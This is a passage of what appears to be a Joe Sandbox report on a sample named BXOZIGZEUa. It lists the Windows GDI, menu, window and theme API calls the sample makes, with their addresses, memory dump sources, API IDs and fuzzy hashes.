                                                                  • SelectObject.GDI32(?,?), ref: 00238934
                                                                  • SelectObject.GDI32(?,?), ref: 00238943
                                                                  • DeleteObject.GDI32(?), ref: 00238948
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00238968
                                                                  • GetPixel.GDI32(?,?,?), ref: 00238987
                                                                  • SetPixel.GDI32(?,?,?,00000000), ref: 002389BD
                                                                  • SelectObject.GDI32(?,?), ref: 002389DF
                                                                  • SelectObject.GDI32(?,?), ref: 002389E7
                                                                  • DeleteObject.GDI32(?), ref: 002389EC
                                                                  • DeleteObject.GDI32(?), ref: 00238A6E
                                                                  • __EH_prolog3.LIBCMT ref: 00238736
                                                                    • Part of subcall function 001D0E38: DeleteObject.GDI32 ref: 001D0E51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Delete$CompatibleCreate$Pixel$BitmapH_prolog3ImageLoad
                                                                  • String ID: $TR/uj"
                                                                  • API String ID: 2657855633-2457051616
                                                                  • Opcode ID: 04e70dd001d1e2888da2fda181aa12b6910a161ddb101d40a2a0a8efaf45b379
                                                                  • Instruction ID: 7bff1e8e8cabfb02c040b225c97631bb4617b4cb869ba0fd8c51f4d762f7684b
                                                                  • Opcode Fuzzy Hash: 04e70dd001d1e2888da2fda181aa12b6910a161ddb101d40a2a0a8efaf45b379
                                                                  • Instruction Fuzzy Hash: F4B13CB191021AEFCF11EFA0CD85AEDBBB5FF18300F50812AF515AA261DB309A65DF51
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00237DAD
                                                                  • CopyImage.USER32(?,00000000,00000000,00000000,00002000), ref: 00237DF0
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00237E2A
                                                                  • DeleteObject.GDI32(?), ref: 00237EA7
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00237EE1
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00237EFD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CompatibleCopyCreateDeleteH_prolog3_Image
                                                                  • String ID:
                                                                  • API String ID: 641560573-0
                                                                  • Opcode ID: 6cf23e6f579cffdf76b9680a4f99887337a628dfb5c67bb836a30246ca859aa9
                                                                  • Instruction ID: be3f0f824835066bbc554cc070e75f7f84db03298e180aeae26c6ba44ced19f7
                                                                  • Opcode Fuzzy Hash: 6cf23e6f579cffdf76b9680a4f99887337a628dfb5c67bb836a30246ca859aa9
                                                                  • Instruction Fuzzy Hash: 37C1BFB1810269EFCF229F60CC84AEDBBB5BF18300F1041E9E58DA6261DB705EA5DF50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002027B4
                                                                  • IsWindow.USER32(?), ref: 00202856
                                                                  • GetMenuItemCount.USER32(00000001), ref: 002029B4
                                                                  • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 002029CA
                                                                  • AppendMenuW.USER32(00000001,00000000,00000000,00000000), ref: 002029E5
                                                                  • SendMessageW.USER32(?,0000040C,00000000,00000000), ref: 00202A5B
                                                                  • SendMessageW.USER32(?,0000041C,00000000,?), ref: 00202A98
                                                                  • GetMenuItemCount.USER32(00000001), ref: 00202AEE
                                                                  • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 00202B04
                                                                  • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 00202B25
                                                                  • GetMenuItemCount.USER32(00000001), ref: 00202B8C
                                                                  • AppendMenuW.USER32(00000001,00000800,00000000,00000000), ref: 00202BA2
                                                                  • AppendMenuW.USER32(00000001,00000000,00000000,?), ref: 00202BC3
                                                                  • AppendMenuW.USER32(00000002,00000000,00000000,?), ref: 00202CAB
                                                                  • GetWindow.USER32(?,00000005), ref: 00202CDC
                                                                  • AppendMenuW.USER32(00000003,00000000,00000000,?), ref: 00202D62
                                                                  • GetMenuItemCount.USER32(00000000), ref: 00202DA7
                                                                  • AppendMenuW.USER32(00000000,00000800,00000000,00000000), ref: 00202DBD
                                                                  • AppendMenuW.USER32(00000000,00000000,00000000,?), ref: 00202DD2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Append$CountItem$MessageSendWindow$H_prolog3_
                                                                  • String ID: To/
                                                                  • API String ID: 2495817426-3711964495
                                                                  • Opcode ID: 9a0d88cb1de993d374dce110ce010c22d659c6c29d7878cbdcbab9f212ea8e2f
                                                                  • Instruction ID: cb2a00e042c6bc1e9ad18d1236dd86806997d84782cbd57651ea7559f78aeba7
                                                                  • Opcode Fuzzy Hash: 9a0d88cb1de993d374dce110ce010c22d659c6c29d7878cbdcbab9f212ea8e2f
                                                                  • Instruction Fuzzy Hash: 63022A30A1421ADBDF249F64CC99BADB7B5BF14304F2440AEE50AAB292CF709D58DF50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00235E0D
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00235E4F
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00235E8B
                                                                  • SelectObject.GDI32(?,?), ref: 00235EAE
                                                                  • _memset.LIBCMT ref: 00235EDE
                                                                  • GetObjectW.GDI32(?,00000054,?), ref: 00235EFF
                                                                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00235F61
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00235FA6
                                                                  • SelectObject.GDI32(?,?), ref: 00235FC4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Create$CompatibleSelect$H_prolog3_Section_memset
                                                                  • String ID: (
                                                                  • API String ID: 1904682052-3887548279
                                                                  • Opcode ID: 5aad308f3f1e118a85cf6321385858853e25a9262bf29fa0e880bffe4e2ecae3
                                                                  • Instruction ID: 9b4a8a8baa67ffd7d52f6a1b9dfb772b5f22c37eb021809eb8f08c1af58a6c6c
                                                                  • Opcode Fuzzy Hash: 5aad308f3f1e118a85cf6321385858853e25a9262bf29fa0e880bffe4e2ecae3
                                                                  • Instruction Fuzzy Hash: 59B13C70910714EFDB61DF24DC89F9ABBB5FF49300F1481A9E88DA6252DB309A94DF21
                                                                  APIs
                                                                    • Part of subcall function 001DCBFE: GetWindowLongW.USER32(?,000000F0), ref: 001DCC09
                                                                  • GetParent.USER32(?), ref: 001D8853
                                                                  • SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 001D8874
                                                                  • GetWindowRect.USER32(?,?), ref: 001D8893
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 001D88C5
                                                                  • MonitorFromWindow.USER32(00000000,00000001), ref: 001D88F9
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 001D8900
                                                                  • CopyRect.USER32(?,?), ref: 001D8914
                                                                  • CopyRect.USER32(?,?), ref: 001D891E
                                                                  • GetWindowRect.USER32(00000000,?), ref: 001D8927
                                                                  • MonitorFromWindow.USER32(00000000,00000002), ref: 001D8934
                                                                  • GetMonitorInfoW.USER32(00000000), ref: 001D893B
                                                                  • CopyRect.USER32(?,?), ref: 001D8949
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$Monitor$Copy$FromInfoLong$MessageParentSend
                                                                  • String ID: (
                                                                  • API String ID: 783970248-3887548279
                                                                  • Opcode ID: 6cf0730ae1887735fbda3dd9911159baab27ddb3bb8343e4092e1705cd7e9283
                                                                  • Instruction ID: d5a6cec975bf6fe7bcb25eadfe165a00718498005383c47a3dff17802e427b16
                                                                  • Opcode Fuzzy Hash: 6cf0730ae1887735fbda3dd9911159baab27ddb3bb8343e4092e1705cd7e9283
                                                                  • Instruction Fuzzy Hash: DA610AB2D00229ABCB15DFA8DD889EEBBB9FF48710F554516F945F7250DB70A900CBA0
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00233BD0
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00233C05
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00233C26
                                                                  • SelectObject.GDI32(?,?), ref: 00233C78
                                                                  • CreateCompatibleDC.GDI32(?), ref: 00233CA5
                                                                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00233D0D
                                                                  • SelectObject.GDI32(?,?), ref: 00233D29
                                                                  • SelectObject.GDI32(?,00000000), ref: 00233D46
                                                                  • SelectObject.GDI32(?,?), ref: 00233D5E
                                                                  • DeleteObject.GDI32(?), ref: 00233D66
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,000000FF,?,00000000,00000000,00CC0020), ref: 00233D8F
                                                                  • GetObjectW.GDI32(?,00000054,?), ref: 00233DC5
                                                                  • SelectObject.GDI32(?,?), ref: 00233FBA
                                                                  • SelectObject.GDI32(?,?), ref: 00233FC8
                                                                  • DeleteObject.GDI32(?), ref: 00233FD0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Create$CompatibleDelete$H_prolog3_Section
                                                                  • String ID: $(
                                                                  • API String ID: 339215182-55695022
                                                                  • Opcode ID: 8585aa2597c2f2bf9f4cb00f75ec0e6b1237ca791e0d82559e926c0b89fc91d9
                                                                  • Instruction ID: 42d0db83119189e4e2c487d2de2b5862236b967eba069ad93edad043d99554e5
                                                                  • Opcode Fuzzy Hash: 8585aa2597c2f2bf9f4cb00f75ec0e6b1237ca791e0d82559e926c0b89fc91d9
                                                                  • Instruction Fuzzy Hash: 73C14670910268DFDB25DF64CD85BADBBB5BF59300F0084EAE58DA6292CB704B94CF61
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 0021F7AE
                                                                  • GetSystemMenu.USER32(?,00000000,?,00000000,?,?,?,0021FE6E,?), ref: 0021F7CD
                                                                  • SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F7F6
                                                                  • GetParent.USER32(?), ref: 0021F7FF
                                                                  • IsZoomed.USER32(?), ref: 0021F80A
                                                                  • EnableMenuItem.USER32(?,0000F000,00000003), ref: 0021F824
                                                                  • EnableMenuItem.USER32(?,0000F010,00000003), ref: 0021F830
                                                                  • EnableMenuItem.USER32(?,0000F030,00000003), ref: 0021F83C
                                                                    • Part of subcall function 001DAB9B: GetParent.USER32(?), ref: 001DABA5
                                                                  • EnableMenuItem.USER32(?,0000F120,00000003), ref: 0021F84F
                                                                  • EnableMenuItem.USER32(?,0000F000,00000000), ref: 0021F85B
                                                                  • EnableMenuItem.USER32(?,0000F010,00000000), ref: 0021F867
                                                                  • EnableMenuItem.USER32(?,0000F030,00000000), ref: 0021F873
                                                                  • GetParent.USER32(?), ref: 0021F87B
                                                                  • DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F8A1
                                                                  • DeleteMenu.USER32(?,0000F030,00000000,?,?,?,0021FE6E,?), ref: 0021F8AD
                                                                  • GetParent.USER32(?), ref: 0021F8B5
                                                                  • DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,?,0021FE6E,?), ref: 0021F8D5
                                                                  • GetParent.USER32(?), ref: 0021F8E7
                                                                  • TrackPopupMenu.USER32(?,00000004,0021FE6E,6AFFFFFF,00000000,?,00000000), ref: 0021F932
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$Enable$Parent$Delete$DefaultPopupSystemTrackZoomed
                                                                  • String ID:
                                                                  • API String ID: 4239930045-0
                                                                  • Opcode ID: 7a3df65ce95d847e418247526e423e571570a05f94ce250c261798ce91f98446
                                                                  • Instruction ID: 986aad5c5dbdcb65f116cc93adad1051a8e66e6842bc179e41f7eafe326b97dd
                                                                  • Opcode Fuzzy Hash: 7a3df65ce95d847e418247526e423e571570a05f94ce250c261798ce91f98446
                                                                  • Instruction Fuzzy Hash: 7B41A231240305BFEB31BBA1DE46F6A7BA9EF94B00F114435F259AB5A1CB71EC50AB14
                                                                  APIs
                                                                  • GetCapture.USER32 ref: 0021669F
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0021670D
                                                                  • SetCursor.USER32(00000000), ref: 00216714
                                                                  • SetRectEmpty.USER32(?), ref: 0021672D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$CaptureEmptyLoadRect
                                                                  • String ID: 83/
                                                                  • API String ID: 2438408-2323854675
                                                                  • Opcode ID: eacc491e1540329cb7107c63bace0134ee830baec0dc15e80fa4f6b3613b8e2d
                                                                  • Instruction ID: 09aa58a4425a70fbc3e265392bece4154703d135f6626a6648632baa8b1b57bf
                                                                  • Opcode Fuzzy Hash: eacc491e1540329cb7107c63bace0134ee830baec0dc15e80fa4f6b3613b8e2d
                                                                  • Instruction Fuzzy Hash: 7CA12771E102199FCF01EFA8D9889EEBBFAFF58300F15402AE845EB214DB71A955CB50
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002338F0
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00233957
                                                                  • GetObjectW.GDI32(002F51CC,00000018,000000FF), ref: 00233975
                                                                  • SelectObject.GDI32(?,002F51CC), ref: 002339B3
                                                                  • CreateCompatibleDC.GDI32(?), ref: 002339D1
                                                                  • CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00233A27
                                                                  • SelectObject.GDI32(?,?), ref: 00233A3C
                                                                  • SelectObject.GDI32(?,00000000), ref: 00233A52
                                                                  • SelectObject.GDI32(?,?), ref: 00233A61
                                                                  • DeleteObject.GDI32(?), ref: 00233A68
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00233ABA
                                                                  • GetPixel.GDI32(?,?,00000000), ref: 00233B82
                                                                  • SetPixel.GDI32(?,?,00000000,?), ref: 00233B97
                                                                  • SelectObject.GDI32(?,?), ref: 00233BB4
                                                                  • SelectObject.GDI32(?,?), ref: 00233BBC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$Create$CompatiblePixel$DeleteH_prolog3_Section
                                                                  • String ID: (
                                                                  • API String ID: 1942225872-3887548279
                                                                  • Opcode ID: c25689e5944af62b18a47c29f35acd05262fcedc5873233a5da8dc60f64d7a30
                                                                  • Instruction ID: a9f7035cb87ca55fa0c8f163f1d767a0859095ec7ae9f1cdeeb9b1ffcbc394c7
                                                                  • Opcode Fuzzy Hash: c25689e5944af62b18a47c29f35acd05262fcedc5873233a5da8dc60f64d7a30
                                                                  • Instruction Fuzzy Hash: 91A100B1C10219EFCF21EFA4D984AADFBB5FF18314F20412AE45AA7261DB705A56DF10
                                                                  APIs
                                                                    • Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 001CD577
                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeTextEx), ref: 001CD58A
                                                                  • GetProcAddress.KERNEL32(00000000,BeginBufferedPaint), ref: 001CD59D
                                                                  • GetProcAddress.KERNEL32(00000000,EndBufferedPaint), ref: 001CD5B0
                                                                  • GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 001CD5FA
                                                                  • GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 001CD60D
                                                                  • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 001CD620
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Activate
                                                                  • String ID: BeginBufferedPaint$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
                                                                  • API String ID: 2388279185-3875329446
                                                                  • Opcode ID: db113bf69160840219af2a1b25601288a3531b0b859b97781bd93e4af2b2ed8a
                                                                  • Instruction ID: f34378952ae01e8e5cb1bc4e34835c58ada0eed43abcb5e7e622611992711da5
                                                                  • Opcode Fuzzy Hash: db113bf69160840219af2a1b25601288a3531b0b859b97781bd93e4af2b2ed8a
                                                                  • Instruction Fuzzy Hash: A32144B15807869BC721AF769C88EDBFBE4EF56704F41083FE4BA93211D770A450CA50
                                                                  APIs
                                                                    • Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504
                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 001F3EF8
                                                                  • GetProcAddress.KERNEL32(?,CloseThemeData), ref: 001F3F05
                                                                  • GetProcAddress.KERNEL32(?,DrawThemeBackground), ref: 001F3F12
                                                                  • GetProcAddress.KERNEL32(?,GetThemeColor), ref: 001F3F1F
                                                                  • GetProcAddress.KERNEL32(?,GetThemeSysColor), ref: 001F3F2C
                                                                  • GetProcAddress.KERNEL32(?,GetCurrentThemeName), ref: 001F3F39
                                                                  • GetProcAddress.KERNEL32(?,GetWindowTheme), ref: 001F3F46
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Activate
                                                                  • String ID: CloseThemeData$DrawThemeBackground$GetCurrentThemeName$GetThemeColor$GetThemeSysColor$GetWindowTheme$OpenThemeData$UxTheme.dll
                                                                  • API String ID: 2388279185-1975976892
                                                                  • Opcode ID: 909a67f350e07626b617d100bd1e11791827ad122d01fcb17e392f01c3b5c7e4
                                                                  • Instruction ID: 701e1c43dcf82f7b8c96700bfa91c5e3ed2fc065060e9064c94f5a251b7e6289
                                                                  • Opcode Fuzzy Hash: 909a67f350e07626b617d100bd1e11791827ad122d01fcb17e392f01c3b5c7e4
                                                                  • Instruction Fuzzy Hash: 173145B1990B949FC730AF2B8944816FBF9BEA5B103518D1FE59682A60D7B6A050CF40
                                                                  APIs
                                                                  • InflateRect.USER32(?,00000004,00000004), ref: 001FC077
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 001FC089
                                                                  • UpdateWindow.USER32(?), ref: 001FC092
                                                                  • GetMessageW.USER32(?,00000000,0000000F,0000000F), ref: 001FC0D1
                                                                  • DispatchMessageW.USER32(?), ref: 001FC0DF
